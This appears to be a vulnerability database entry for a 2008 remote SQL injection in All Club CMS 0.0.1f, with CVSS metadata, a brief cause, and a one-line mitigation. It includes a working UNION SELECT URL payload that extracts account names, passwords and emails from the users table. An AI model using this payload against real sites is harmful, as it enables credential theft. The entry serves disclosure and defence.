vendor:
All Club CMS
by:
ka0x
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: All Club CMS
Affected Version From: 0.0.1f
Affected Version To: 0.0.1f
Patch Exists: NO
Related CWE: N/A
CPE: a:all_club_cms:all_club_cms
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability
Stripslashes function only deletes backslashes () and the backslashes doubles (\) becomes simple (). Exploit: http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*
Mitigation:
Ensure that the application is not vulnerable to SQL injection attacks by using parameterized queries, stored procedures, and other techniques.